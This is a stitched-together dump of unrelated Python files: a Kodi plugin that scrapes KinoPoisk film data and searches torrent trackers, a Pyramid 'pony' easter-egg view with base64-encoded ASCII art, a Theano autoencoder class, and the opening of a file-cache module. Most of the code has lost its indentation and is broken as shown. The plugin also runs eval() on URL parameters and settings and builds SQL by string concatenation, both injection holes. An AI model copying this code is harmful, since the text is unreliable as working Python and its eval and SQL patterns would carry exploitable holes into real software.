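# get_params() strips the leading "?" and returns {'mode': 'Search', 'title': 'Foo'}.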
import sqlite3 as db
db_name = os.path.join( addon.getAddonInfo('path'), "move_info.db" )
c = db.connect(database=db_name)
cu = c.cursor()
def add_to_db(n, item):
item=item.replace("'","XXCC").replace('"',"XXDD")
err=0
tor_id="n"+n
litm=str(len(item))
try:
cu.execute("CREATE TABLE "+tor_id+" (db_item VARCHAR("+litm+"), i VARCHAR(1));")
c.commit()
except:
err=1
print "Ошибка БД"
if err==0:
cu.execute('INSERT INTO '+tor_id+' (db_item, i) VALUES ("'+item+'", "1");')
c.commit()
#c.close()
def get_inf_db(n):
tor_id="n"+n
cu.execute(str('SELECT db_item FROM '+tor_id+';'))
c.commit()
Linfo = cu.fetchall()
info=Linfo[0][0].replace("XXCC","'").replace("XXDD",'"')
return info
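# Round-trip sketch (illustrative comment): add_to_db('1', 'a "quoted" value') creates
# table n1 with double quotes stored as XXDD (and single quotes as XXCC);
# get_inf_db('1') maps both back and returns the original string.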
def s2kp(id, info):
#try:
import tokp
skp=tokp.Tracker()
RL,VL = skp.Search(id)
if len(RL)>0 or len(VL)>0:
Title = "[COLOR F050F050]"+"[-------------- «2kinopoisk.ru» --------------]"+"[/COLOR]"
row_url = Title
listitem = xbmcgui.ListItem(Title)
listitem.setInfo(type = "Video", infoLabels = {"Title": Title} )
purl = sys.argv[0] + '?mode=Search'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&text=' + urllib.quote_plus('0')
xbmcplugin.addDirectoryItem(handle, purl, listitem, True)
for itm in VL:
Title = "| 720p | VK.com | "+info["title"]+" [B][Смотреть онлайн][/B]"
row_url = itm
print itm
cover="http://vk.com/images/faviconnew.ico"
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, itm, listitem, False, len(RL))
for itm in RL:
Title = "|"+itm[0]+"|"+itm[1]+"| "+itm[2]
row_url = itm[3]
print row_url
cover=itm[4]
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, len(RL))
return len(RL)
#except:
#return 0
def rutor(text, info={}):
#try:
import rutors
rtr=rutors.Tracker()
#except: pass
RL=rtr.Search(text, "0")
if len(RL)>0:
Title = "[COLOR F050F050]"+"[------- «Rutor» "+text+" ---------]"+"[/COLOR]"
row_url = Title
listitem = xbmcgui.ListItem(Title)
listitem.setInfo(type = "Video", infoLabels = {"Title": Title} )
purl = sys.argv[0] + '?mode=Search'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&text=' + urllib.quote_plus('0')
xbmcplugin.addDirectoryItem(handle, purl, listitem, True)
for itm in RL:
Title = "|"+itm[0]+"|"+itm[1]+"| "+itm[2]
row_url = itm[3]
cover=""
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, len(RL))
return len(RL)
def stft(text, info={}):
try:
import krasfs
tft=krasfs.Tracker()
except: pass
RL=tft.Search(text, 4)
if len(RL)>0:
Title = "[COLOR F050F050]"+"[------- «KrasFS.ru» "+text+" ---------]"+"[/COLOR]"
row_url = Title
listitem = xbmcgui.ListItem(Title)
listitem.setInfo(type = "Video", infoLabels = {"Title": Title} )
purl = sys.argv[0] + '?mode=Search'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&text=' + urllib.quote_plus('0')
xbmcplugin.addDirectoryItem(handle, purl, listitem, True)
for itm in RL:
Title = "|"+itm[0]+"|"+itm[1]+"| "+itm[2]
row_url = itm[3]
cover=""
dict={}
listitem = xbmcgui.ListItem(Title, thumbnailImage=cover, iconImage=cover)
try:listitem.setInfo(type = "Video", infoLabels = dict)
except: pass
listitem.setProperty('fanart_image', cover)
purl = sys.argv[0] + '?mode=OpenTorrent'\
+ '&url=' + urllib.quote_plus(row_url)\
+ '&title=' + urllib.quote_plus(Title)\
+ '&info=' + urllib.quote_plus(repr(info))
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, len(RL))
return len(RL)
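# Added commentary (not original code): rutor() and stft() above return the number
# of result rows they produced; the "Torrents2" handler further down uses those
# counts to fall back to another tracker or to an alternative search string when
# too few results are found.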
def AddItem(Title = "", mode = "", info = {"cover":icon}, total=100):
params["mode"] = mode
params["info"] = info
cover = info["cover"]
try:fanart = info["fanart"]
except: fanart = ''
try:id = info["id"]
except: id = ''
listitem = xbmcgui.ListItem(Title, iconImage=cover)#, thumbnailImage=cover
listitem.setInfo(type = "Video", infoLabels = info )
listitem.setProperty('fanart_image', fanart)
 purl = sys.argv[0] + '?mode='+mode+ '&params=' + urllib.quote_plus(repr(params))
if mode=="Torrents":
#listitem.addContextMenuItems([('Hайти похожие', 'SrcNavi("Navigator:'+id+'")')])
listitem.addContextMenuItems([('Hайти похожие', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=Recomend&id='+id+'")'), ('Персоны', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=Person&id='+id+'")')])
xbmcplugin.addDirectoryItem(handle, purl, listitem, False, total)
elif mode=="PersonFilm":
listitem.addContextMenuItems([('Добавить в Персоны', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=AddPerson&info='+urllib.quote_plus(repr(info))+'")'), ('Удалить из Персоны', 'Container.Update("plugin://plugin.video.KinoPoisk.ru/?mode=RemovePerson&info='+urllib.quote_plus(repr(info))+'")')])
xbmcplugin.addDirectoryItem(handle, purl, listitem, True, total)
else:xbmcplugin.addDirectoryItem(handle, purl, listitem, True, total)
def FC(s, color="FFFFFF00"):
s="[COLOR "+color+"]"+s+"[/COLOR]"
return s
def AddPerson(info):
try:PL=eval(__settings__.getSetting("PersonList"))
except: PL=[]
if info not in PL:
PL.append(info)
__settings__.setSetting(id="PersonList", value=repr(PL))
def RemovePerson(info):
try:PL=eval(__settings__.getSetting("PersonList"))
except: PL=[]
NL=[]
for i in PL:
if i!=info: NL.append(i)
__settings__.setSetting(id="PersonList", value=repr(NL))
def PersonList():
try:PL=eval(__settings__.getSetting("PersonList"))
except: PL=[]
for i in PL:
AddItem(fs(i["title"]), "PersonFilm", i, len(PL))
#__settings__.setSetting(id="PersonList", value=repr(PL))
def Person():
try:id = urllib.unquote_plus(get_params()["id"])
except: id = ''
link="http://m.kinopoisk.ru/cast/"+id+"/"
ss='<dt>'
se='</dd><dt>'
http = GET (link, httpSiteUrl)
L=mfindal(http, ss, se)
for i in L:
ss='<dt>'
se='</dt><dd>'
tb=mfindal(i, ss, se)[0][4:]
AddItem(FC(fs(tb)), "", {"cover":icon}, len(L))
ss='/person/'
se='</a>'
L2=mfindal(i, ss, se)
for j in L2:
n=j.find('/">')
nm=j[n+3:]
id=j[8:n]
cover="http://st.kp.yandex.net/images/sm_actor/"+id+".jpg"
cover="http://st.kp.yandex.net/images/actor_iphone/iphone360_"+id+".jpg"
#.replace('sm_film/','film_iphone/iphone360_')+'.jpg'
info={"cover":cover, "title":nm, "id":id}
AddItem(fs(nm), "PersonFilm", info, len(L))
def SrcNavi(md="Navigator"):
#ss="/level/1/film/"
ss='id="film_eye_'
#se='/">'
se='"></div>'
if md =="Navigator":
Cats=getList("CutList")
#Genres=getList("GenreList")
Cantrys=getList("CantryList")
Years=__settings__.getSetting("YearList")
Old=__settings__.getSetting("OldList")
Sort=__settings__.getSetting("SortList")
Rating=__settings__.getSetting("RatingList")
Cat=getList2("CatList")
sCat=""
for i in Cat:
sCat=sCat+"m_act%5B"+str(CategoryDict[i])+"%5D/on/"
if sCat == "m_act%5B%5D/on/" or sCat == "m_act%5Ball%5D/on/": sCat =""
Cantry=getList2("CantryList")
Cantrys=""
for i in Cantry:
Cantrys=Cantrys+","+str(CantryDict[i])
Cantrys=Cantrys[1:]
if Cantrys == "" or Cantrys == "0": sCantry =""
else: sCantry = "m_act%5Bcountry%5D/"+ Cantrys+"/"
Genre=getList2("GenreList")
Genres=""
for i in Genre:
Genres=Genres+","+str(GenreDict[i])
Genres=Genres[1:]
if Genres == "" or Genres == "0": sGenre =""
else: sGenre = "m_act%5Bgenre%5D/"+ Genres+"/"
try:YearId = YearDict[Years]
except:YearId="0"
if YearId == "0": sYear = ""
else: sYear = "m_act%5Bdecade%5D/"+ YearId+"/"
try:OldId = OldDict[Old]
except:OldId=""
if OldId == "": sOld = ""
else: sOld = "m_act%5Brestriction%5D/"+ OldId+"/"
try:RatingId = RatingDict[Rating]
except:RatingId=""
if RatingId == "": sRating = ""
else: sRating = "m_act%5Brating%5D/"+ RatingId+":/"
try:sSort = SortDict[Sort]
except:sSort = "order/rating"
if sCat.find("is_serial%5D/on")<0 and sCat!="": sGenre=sGenre+"m_act%5Begenre%5D/999/"
print sCat
print sGenre
link=httpSiteUrl+"/top/navigator/"+sGenre+sCantry+sYear+sRating+sOld+sCat+sSort+"/perpage/100/#results"
if link=="http://www.KinoPoisk.ru/top/navigator/order/rating/perpage/100/#results":
link="http://www.KinoPoisk.ru/top/navigator/m_act%5Brating%5D/7:/order/rating/perpage/100/#results"
elif md=="Popular": link="http://www.kinopoisk.ru/top/lists/186/filtr/all/sort/order/perpage/200/"
elif md=="New": link="http://www.kinopoisk.ru/top/lists/222/"
elif md=="Future":
#link="http://www.kinopoisk.ru/top/lists/220/"
link="http://www.kinopoisk.ru/comingsoon/sex/all/sort/date/period/halfyear/"
ss='id="top_film_'
se='" class="item" style="z'
elif md=="Recomend":
try:id = urllib.unquote_plus(get_params()["id"])
except: id = ''
link="http://www.kinopoisk.ru/film/"+id+"/like/"
#print link
elif md=="PersonFilm":
id = params["info"]["id"]
#try:id = eval(urllib.unquote_plus(get_params()["info"]))["id"]
#except: id = ''
link="http://m.kinopoisk.ru/person/"+id+"/"
ss="m.kinopoisk.ru/movie/"
se='/">'
#print link
else:
link='http://www.kinopoisk.ru/index.php?first=no&what=&kp_query='+formatKP(md)
ss="/level/1/film/"
se='/sr/1/">'
http = GET (link, httpSiteUrl)
#debug (http)
#ss="/level/1/film/"
#ss='id="film_eye_'
#se='/">'
#se='"></div>'
L=mfindal(http, ss, se)
#debug (str(L))
L2=[]
for i in L:
if i not in L2 and i<>"": L2.append(i)
#debug (str(L2))
for i in L2[:-1]:#
FilmID=i[len(ss):]
#info=eval(xt(get_inf_db(FilmID)))
try:
info=eval(xt(get_inf_db(FilmID)))
nru=info["title"]
rating_kp=info["rating"]
if rating_kp>0: rkp=str(rating_kp)[:3]
else: rkp= " - - "
info["id"] = FilmID
#AddItem("[ "+rkp+" ] "+nru, "Torrents", info, len(L2)-2)
#print " OK: "+nru
except:
# if len(i)>10:
url="http://m.kinopoisk.ru/movie/"+i[len(ss):]
http = GET (url, httpSiteUrl)
#debug (http)
    # ------------- find the description block -----------------
s='<div id="content">'
e='<br><div class="city">'
try: Info=mfindal(http, s, e)[0]
except: Info=""
#debug (Info)
    # ------------- title -----------------
s='<p class="title">'
e='<img src="http://m.kinopoisk.ru/images/star'
if Info.find(e)<0: e='<div class="block film">'
try:
nbl=mfindal(Info, s, e)[0][len(s):]
except:
nbl=""
if nbl <> "":
# ---------------- ru -------------------
s='<b>'
e='</b>'
nru=mfindal(nbl, s, e)[0][len(s):]
     # ---------------- en title / year / running time -------------------
s='<span>'
e='</span>'
nen=mfindal(nbl, s, e)[0][len(s):]
vrn=nen.replace("'","#^").replace(",", "','")
tmps="['"+vrn+"']"
Lt=eval(tmps)
n=len(Lt)
year=0
duration=""
for i in Lt:
try: year=int(i)
except: pass
if i[-1:]==".": duration=i
if year>0: n2= nen.find(str(year))
else: n2=-1
if duration<>"":n3=nen.find(duration)
else: n3=-1
if n3>0 and n3<n2: n2=n3
if n2>1: nen=nen[:n2-2]
else: nen=nru
     # ---------------- genre / country ----------
s='<div class="block film">'
e='<span class="clear"'
try:
b2=mfindal(Info, s, e)[0][len(s):]
s='<span>'
e='</span>'
genre=mfindal(b2, s, e)[0][len(s):]
studio=mfindal(b2, s, e)[1][len(s):]
except:
genre=""
studio=""
     # ---------------- director ----------
s='<span class="clear">'
e='</a></span>'
try:
directors=mfindal(Info, s, e)[0][len(s):]
s='/">'
e='</a>'
try:
director1=mfindal(directors, s, e)[0][len(s):]
nn=directors.rfind('/">')
director=director1+", "+directors[nn+3:]
except:
nn=directors.rfind('/">')
director=directors[nn+3:]
except:
director=""
     # --------------- cast ------------
if director!="":
s=directors#'<span class="clear">'
e='<p class="descr">'
if Info.find(e)<0:e='">...</a>'
try:bcast=mfindal(Info, s, e)[0][len(s):]
except: bcast=""
s='/">'
e='</a>,'
lcast=mfindal(bcast, s, e)
cast=[]
for i in lcast:
cast.append(fs(i[3:]))
else:
cast=[]
     # ---------------- plot description ----------
s='<p class="descr">'
e='<span class="link">'
if Info.find(e)<0: e='<p class="margin"'
#debug (Info)
try:plotand=mfindal(Info, s, e)[0][len(s):]
except:plotand=""# ----------------------------------------------------------- доделать ----------
nn=plotand.find("</p>")
plot=plotand[:nn].replace("<br>","").replace("<br />","")
     # ----------------- ratings ------------
tale=plotand[nn:]
s='</b> <i>'
e='</i> ('
ratings=mfindal(Info, s, e)
try:rating_kp=float(ratings[0][len(s):])
except:rating_kp=0
try:rating_IMDB=float(ratings[1][len(s):])
except: rating_IMDB=0
     # ------------------ cover ----------
s='http://st.kp.yandex.net/images/sm_'
e='.jpg" width="'
try:cover=mfindal(Info, s, e)[0].replace('sm_film/','film_iphone/iphone360_')+'.jpg'
except:cover="http://st.kp.yandex.net/images/image_none_no_border.gif"
     # ------------------ fanart ----------
s='http://st.kp.yandex.net/images/kadr'
e='.jpg"/></div>'
try:fanart=mfindal(Info, s, e)[0].replace('sm_','')+'.jpg'
except:fanart=""
info = {"title":fs(nru),
"originaltitle":fs(nen),
"year":year,
"duration":duration[:-5],
"genre":fs(genre),
"studio":fs(studio),
"director":fs(director),
"cast":cast,
"rating":rating_kp,
"cover":cover,
"fanart":fanart,
"plot":fs(plot)
}
info["id"] = FilmID
if rating_kp>0: rkp=str(rating_kp)[:3]
else: rkp= " - - "
nru=fs(nru)
#AddItem("[ "+rkp+" ] "+fs(nru), "Torrents", info, len(L2)-2)
try:
if rating_kp>0: add_to_db(FilmID, repr(info))
#print "ADD: " + FilmID
except:
print "ERR: " + FilmID
#print repr(info)
try: AddItem("[ "+rkp+" ] "+ nru, "Torrents", info, len(L2)-2)
except: pass
#============== Menu ====================
def Root():
AddItem("Поиск", "Search")
AddItem("Навигатор", "Navigator")
AddItem("Популярные", "Popular")
AddItem("Недавние премьеры", "New")
AddItem("Самые ожидаемые", "Future")
AddItem("Персоны", "PersonList")
def Search():
SrcNavi(inputbox())
def PersonSearch():
PS=inputbox()
link='http://www.kinopoisk.ru/index.php?first=no&what=&kp_query='+formatKP(PS)
http = GET (link, httpSiteUrl)
ss='http://st.kp.yandex.net/images/sm_actor/'
es='" title="'
l1=mfindal(http,ss,es)
for i in l1:
if len(i) > 45 and len(i)< 550:
n=i.find('.jpg" alt="')
id=i[len(ss):n]
nm=i[n+11:]
cover='http://st.kp.yandex.net/images/actor_iphone/iphone360_'+id+".jpg"
info={"cover":cover, "title":nm, "id":id}
if len(nm)>0 and len(id)>0 :AddItem(fs(nm), "PersonFilm", info, len(l1))
#debug (http)
def getList(id):
try:L = eval(__settings__.getSetting(id))
except:L =[]
S=""
for i in L:
if i[:1]=="[": S=S+", "+i
return S[1:]
def getList2(id):
try:L = eval(__settings__.getSetting(id))
except:L =[]
S=[]
for i in L:
if i[:1]=="[": S.append(i.replace("[COLOR FFFFFF00]","").replace("[/COLOR]",""))
return S
def setList(idw, L):
__settings__.setSetting(id=idw, value=repr(L))
def Navigator():
Cats=getList("CatList")
Genres=getList("GenreList")
Cantrys=getList("CantryList")
Years=__settings__.getSetting("YearList")
Old=__settings__.getSetting("OldList")
Sort=__settings__.getSetting("SortList")
Rating=__settings__.getSetting("RatingList")
if Cats=="": Cats="[COLOR FFFFFF00] --[/COLOR]"
if Genres=="": Genres="[COLOR FFFFFF00] --[/COLOR]"
if Cantrys=="": Cantrys="[COLOR FFFFFF00] --[/COLOR]"
if Years=="": Years="--"
if Old=="": Old="--"
if Rating=="": Rating="> 7"
if Sort=="": Sort="рейтингу Кинопоиска"
AddItem("Категории: " +Cats, "SelCat")
AddItem("Жанры: " +Genres, "SelGenre")
AddItem("Страны: " +Cantrys, "SelCantry")
AddItem("Год: [COLOR FFFFFF00]" +Years+"[/COLOR]", "SelYear")
AddItem("Возраст: [COLOR FFFFFF00]" +Old+"[/COLOR]", "SelOld")
AddItem("Рейтинг: [COLOR FFFFFF00]" +Rating+"[/COLOR]", "SelRating")
AddItem("Порядок: [COLOR FFFFFF00]по " +Sort+"[/COLOR]", "SelSort")
AddItem("[B][COLOR FF00FF00][ Искать ][/COLOR][/B]", "SrcNavi")
def Popular():
AddItem("Популярные", "Popular")
def New():
AddItem("Недавние премьеры", "New")
def Future():
AddItem("Самые ожидаемые", "Future")
Category=[]
CategoryDict={}
for i in TypeList:
Category.append(i[1])
CategoryDict[i[1]]=i[0]
Genre=[]
GenreDict={}
for i in GenreList:
Genre.append(i[1])
GenreDict[i[1]]=i[0]
Cantry=[]
CantryDict={}
for i in CantryList:
Cantry.append(i[1])
CantryDict[i[1]]=i[0]
Year=[]
YearDict={}
for i in YearList:
Year.append(i[1])
YearDict[i[1]]=i[0]
Old=[]
OldDict={}
for i in OldList:
Old.append(i[1])
OldDict[i[1]]=i[0]
Sort=[]
SortDict={}
for i in SortList:
Sort.append(i[1])
SortDict[i[1]]=i[0]
Rating=[]
RatingDict={}
for i in RatingList:
Rating.append(i[1])
RatingDict[i[1]]=i[0]
try: url = eval(urllib.unquote_plus(get_params()["url"]))
except: url = ""
try: info = eval(urllib.unquote_plus(get_params()["info"]))
except: info = {}
try: params = eval(urllib.unquote_plus(get_params()["params"]))
except: params = {}
try: mode = urllib.unquote_plus(get_params()["mode"])
except:
try:mode = params["mode"]
except:mode = None
if mode == None:
setList("CatList", Category)
setList("GenreList", Genre)
setList("CantryList", Cantry)
__settings__.setSetting(id="YearList", value="")
__settings__.setSetting(id="OldList", value="")
__settings__.setSetting(id="SortList", value="")
__settings__.setSetting(id="RatingList", value="")
Root()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Search":
Search()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Navigator":
Navigator()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Popular":
SrcNavi("Popular")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "New":
SrcNavi("New")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Future":
SrcNavi("Future")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Recomend":
#xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
#xbmcplugin.endOfDirectory(handle)
#xbmc.sleep(1000)
SrcNavi("Recomend")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "PersonFilm":
SrcNavi("PersonFilm")#+PeID
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Person":
Person()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "PersonList":
AddItem("[ Поиск ]", "PersonSearch")
PersonList()
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode=="PersonSearch":
PersonSearch()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode=="AddPerson":
AddPerson(info)
if mode=="RemovePerson":
RemovePerson(info)
xbmc.executebuiltin("Container.Refresh()")
if mode == "SrcNavi":
SrcNavi()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "SelCat":
SelectBox.run("CatList")
if mode == "SelGenre":
SelectBox.run("GenreList")
if mode == "SelCantry":
SelectBox.run("CantryList")
if mode == "SelYear":
sel = xbmcgui.Dialog()
r = sel.select("Десятилетие:", Year)
__settings__.setSetting(id="YearList", value=Year[r])
if mode == "SelOld":
sel = xbmcgui.Dialog()
r = sel.select("Возраст:", Old)
__settings__.setSetting(id="OldList", value=Old[r])
if mode == "SelSort":
sel = xbmcgui.Dialog()
r = sel.select("Десятилетие:", Sort)
__settings__.setSetting(id="SortList", value=Sort[r])
if mode == "SelRating":
sel = xbmcgui.Dialog()
r = sel.select("Десятилетие:", Rating)
__settings__.setSetting(id="RatingList", value=Rating[r])
if mode == "Torrents":
 gty=sys.argv[0] + '?mode=Torrents2&params='+ urllib.quote_plus(repr(params))
xbmc.executebuiltin("Container.Update("+gty+", "+gty+")")
if mode == "Torrents2":
info=params["info"]
id=params["info"]["id"]
try:rus=params["info"]["title"].encode('utf8')
except: rus=params["info"]["title"]
try:en=params["info"]["originaltitle"].encode('utf8')
except: en=params["info"]["originaltitle"]
if rus == en:text = rus.replace("a","а")+" "+str(params["info"]["year"])
else:text = params["info"]["originaltitle"]+" "+str(params["info"]["year"])+" "+rus.replace("a","а")
n=text.find("(")
#if n>0: text = text[:n-1]
#ttl=s2kp(id, info)
ttl=rutor(text, info)
if ttl<15:
ttl=stft(text, info)
if ttl<10:
n=en.find("(")
if n>0: text = en[:n-1]
else: text = en
ttl=stft(text, info)
if ttl<10:
n=rus.find("(")
if n>0: text = rus.replace("a","а")[:n-1]
else: text = rus.replace("a","а")
ttl=stft(text, info)
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
xbmc.sleep(300)
xbmc.executebuiltin("Container.SetViewMode(51)")
if mode == "OpenTorrent":
url = urllib.unquote_plus(get_params()["url"])
try:img=info["cover"]
except: img=icon
engine = __settings__.getSetting("Engine")
#print "engine = "+str(engine)
if engine==0 or engine=='0':
play_url(url,img)
else:
DownloadDirectory = __settings__.getSetting("DownloadDirectory")[:-1]#.replace("\\\\","\\")
if DownloadDirectory=="":DownloadDirectory=LstDir
playTorrent(url, DownloadDirectory)
elif mode == 'play_url2':
play_url2(get_params())
c.close() | sshnaidm/ru | plugin.video.KinoPoisk.ru/default.py | Python | gpl-2.0 | 38,625 |
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Modified by Mike Orr for Akhet.
"""
We have a pony and a unicorn.
"""
import base64
import zlib
from pyramid.response import Response
def includeme(config):
"""Add pony power to any Pyramid application.
Defines the "pony" route at URL "/pony".
"""
config.add_route("pony", "/pony")
config.add_view(view, route_name="pony")
PONY = """
eJyFkkFuxCAMRfdzCisbJxK2D5D2JpbMrlI3XXQZDt9PCG0ySgcWIMT79rcN0XClUJlZRB9jVmci
FmV19khjgRFl0RzrKmqzvY8lRUWFlXvCrD7UbAQR/17NUvGhypAF9og16vWtkC8DzUayS6pN3/dR
ki0OnpzKjUBFpmlC7zVFRNL1rwoq6PWXXQSnIm9WoTzlM2//ke21o5g/l1ckRhiPbkDZXsKIR7l1
36hF9uMhnRiVjI8UgYjlsIKCrXXpcA9iX5y7zMmtG0fUpW61Ssttipf6cp3WARfkMVoYFryi2a+w
o/2dhW0OXfcMTnmh53oR9egzPs+qkpY9IKxdUVRP5wHO7UDAuI6moA2N+/z4vtc2k8B+AIBimVU=
"""
UNICORN = """
eJyVVD1vhDAM3e9XeAtIxB5P6qlDx0OMXVBzSpZOHdsxP762E0JAnMgZ8Zn37OePAPC60eV1Dl5b
SS7fB6DmQNGhtegpNlPIQS8HmkYGdSqNqDF9wcMYus4TuBYGsZwIPqXfEoNir5K+R3mbzhlR4JMW
eGpikPpn9wHl2sDgEH1270guZwzKDRf3nTztMvfI5r3fJqEmNxdCyISBcWjNgjPG8Egg2hgT3mJi
KBwNvmPB1hbWJ3TwBfMlqdTzxNyDE2H8zOD5HA4KkqJGPVY/TwnxmPA82kdSJNj7zs+R0d1pB+JO
xn2DKgsdxAfFS2pfTSD0Fb6Uzv7dCQSvE5JmZQEQ90vNjBU1GPuGQpCPS8cGo+dQgjIKqxnJTXbw
ucFzPFVIJXtzk6BXKGPnYsKzvFmGx7A0j6Zqvlvk5rETXbMWTGWj0RFc8QNPYVfhJfMMniCPazWJ
lGtPZecIGJWW6oL2hpbWRZEkChe8eg5Wb7xx/MBZBFjxeZPEss+mRQ3Uhc8WQv684seSRO7i3nb4
7HlKUg8sraz47LmXyh8S0somADvoUpoHjGWl+rUkF0H+EIf/gbyyMg58BBk6L634/fkHUCodMw==
"""
TEMPLATE = """\
<!DOCTYPE html>
<html><head><title>Pony</title></head><body>
<pre>{animal}</pre>
<p><a href="{url}">{link}</a></p>
<p><a href="{home}">Home</a></p>
</body></html>
"""
def view(request):
"""A pony view.
Display a pony.
If query param 'horn' is non-empty, display a unicorn instead.
"""
req = request
home = req.script_name or "/"
url = req.path
if request.params.get("horn"):
data = UNICORN
link = "remove horn!"
url = req.path
else:
data = PONY
link = "add horn!"
url = req.path + "?horn=1"
#animal = data.decode("base64").decode("zlib")
data = base64.b64decode(data)
animal = zlib.decompress(data).decode('ascii')
html = TEMPLATE.format(animal=animal, url=url, link=link, home=home)
return Response(html)
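# Hedged usage sketch (added commentary; the dotted module path is an assumption
# based on this file's location):
#
#   from pyramid.config import Configurator
#   config = Configurator()
#   config.include("pyramid_pony.pony")   # runs includeme(), registering /pony
#   app = config.make_wsgi_app()
#
# GET /pony then renders the ASCII pony; GET /pony?horn=1 renders the unicorn.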
| knzm/pyramid_pony | pyramid_pony/pony.py | Python | mit | 2,385 |
import theano
import numpy as np
import theano.tensor as T
from random import sample
sigmoid = lambda x: 1 / (1 + T.exp(-x))
class DAE(object):
"""Defines a multi autoencoder.
layer_types can be either 'logistic' or 'linear' at the moment.
"""
def __init__(self, input_dim, layer_sizes, layer_types, sparse=False):
self.input_dim = input_dim
self.layer_sizes = layer_sizes
self.layer_types = layer_types
self.weights = []
self.biases = []
self.weights.append(theano.shared(np.asarray(np.random.normal(0, 1, (input_dim, layer_sizes[0])), dtype='float32')))
for i, j in zip(layer_sizes[:-1], layer_sizes[1:]):
w = np.asarray(np.random.normal(0, 1, (i, j)), dtype='float32')
self.weights.append(theano.shared(w))
self.weights.append(theano.shared(np.asarray(np.random.normal(0, 1, (layer_sizes[-1], input_dim)), dtype='float32')))
if sparse:
for w in self.weights:
w_ = w.get_value()
m, n = w_.shape
if m >= 15:
mask = np.zeros_like(w_)
for i in range(n):
indices = sample(range(m), 15)
mask[indices, i] = 1.0
w.set_value(w_ * mask)
self.biases = [theano.shared(np.zeros(i, dtype='float32')) for i in layer_sizes]
self.biases.append(theano.shared(np.zeros(input_dim, dtype='float32')))
self.parameters = self.weights + self.biases
def t_forward(self, x, return_linear=False):
a = x
for w, b, function in zip(self.weights, self.biases, self.layer_types):
s = T.dot(a, w) + T.shape_padleft(b, 1)
if function == 'logistic':
a = sigmoid(s)
else:
a = s
if return_linear:
return a, s
return a
def t_ce(self, x, t):
y = self.t_forward(x)
return T.nnet.binary_crossentropy(y, t).mean()
def t_stable_ce(self, s, t):
# FIXME: I get nans if I use the mean
return -(t * (s - T.log(1 + T.exp(s))) + (1 - t) *
(-s - T.log(1 + T.exp(-s))))
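# Hedged usage sketch (not part of the original module): the layer sizes, layer
# types and the random toy batch below are illustrative assumptions only.
if __name__ == "__main__":
    x = T.matrix('x', dtype='float32')
    # input_dim=4 with hidden sizes [8, 4] yields three weight matrices, so three
    # layer types are required (one per affine + activation step).
    dae = DAE(input_dim=4, layer_sizes=[8, 4],
              layer_types=['logistic', 'logistic', 'logistic'])
    forward = theano.function([x], dae.t_forward(x))
    batch = np.asarray(np.random.rand(2, 4), dtype='float32')
    print(forward(batch).shape)  # reconstruction width matches input_dim: (2, 4)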
| pbrakel/ksd-theano | autoencoder.py | Python | mit | 2,216 |
#! /usr/bin/env python
import os
import hashlib
import cPickle
import time
import base64
import inspect
__all__ = ["CacheError", "FSCache", "make_digest",
"auto_cache_function", "cache_function", "to_seconds"]
class CacheError(Exception):
pass
class TimeError(CacheError):
pass
class LifetimeError(CacheError):
pass
class CacheObject(object):
"""
A wrapper for values, to allow for more elaborate control
like expirations some time in the far, far, distant future,
if ever. So don't count on it unless someone writes a patch.
"""
